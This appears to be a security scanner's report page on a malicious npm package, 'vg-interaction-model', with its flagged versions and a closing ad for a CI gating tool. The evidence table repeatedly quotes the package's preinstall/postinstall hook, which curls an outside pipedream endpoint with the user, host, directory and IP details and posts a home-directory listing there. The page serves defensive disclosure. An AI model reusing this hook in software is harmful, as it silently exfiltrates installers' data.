PkgRadar

npm · registry.npmjs.org

vg-interaction-model

Install Lifecycle Repeated Payload: preinstall,postinstall="curl -s \"https://eof85dbndyyqbi1.m.pipedream.net/vg-interaction-model/?user=$(whoami)&host=$(hostname)&dir=$PWD&ip=$(curl -s https:/ipinfo.io/ip)&l-ip=$(hostname -i)&time=$(date +%s)\" && curl -X POST -d \"data=$(cd;ls -la)\" https://eof85dbndyyqbi1.m.pipedream.net/home-dir > /dev/null || true"

Why PkgRadar flagged 40.0.5

SeveritySignalEvidence
highInstall Lifecycle Repeated Payloadpreinstall,postinstall="curl -s \"https://eof85dbndyyqbi1.m.pipedream.net/vg-interaction-model/?user=$(whoami)&host=$(hostname)&dir=$PWD&ip=$(curl -s https:/ipinfo.io/ip)&l-ip=$(hostname -i)&time=$(date +%s)\" && curl -X POST -d \"data=$(cd;ls -la)\" https://eof85dbndyyqbi1.m.pipedream.net/home-dir > /dev/null || true" · package.json
highInstall Lifecycle Suppresses Failurepreinstall="curl -s \"https://eof85dbndyyqbi1.m.pipedream.net/vg-interaction-model/?user=$(whoami)&host=$(hostname)&dir=$PWD&ip=$(curl -s https:/ipinfo.io/ip)&l-ip=$(hostname -i)&time=$(date +%s)\" && curl -X POST -d \"data=$(cd;ls -la)\" https://eof85dbndyyqbi1.m.pipedream.net/home-dir > /dev/null || true" · package.json
highInstall Lifecycle Suppresses Failurepostinstall="curl -s \"https://eof85dbndyyqbi1.m.pipedream.net/vg-interaction-model/?user=$(whoami)&host=$(hostname)&dir=$PWD&ip=$(curl -s https:/ipinfo.io/ip)&l-ip=$(hostname -i)&time=$(date +%s)\" && curl -X POST -d \"data=$(cd;ls -la)\" https://eof85dbndyyqbi1.m.pipedream.net/home-dir > /dev/null || true" · package.json

Scanned versions

VersionVerdictScoreScanned (UTC)
0.0.1-securityLow risk02026-06-03
40.0.5High risk752026-06-03
40.0.6High risk752026-06-03
40.0.3High risk752026-06-03
40.0.4High risk752026-06-03
40.0.2High risk752026-06-03
40.0.1High risk752026-06-03

Block this in CI

PkgRadar gates vg-interaction-model (and every other dependency) before it merges. One line in your pipeline:

pkgradar gate --ecosystem npm [email protected]
Start free — 25 scans / moView full evidence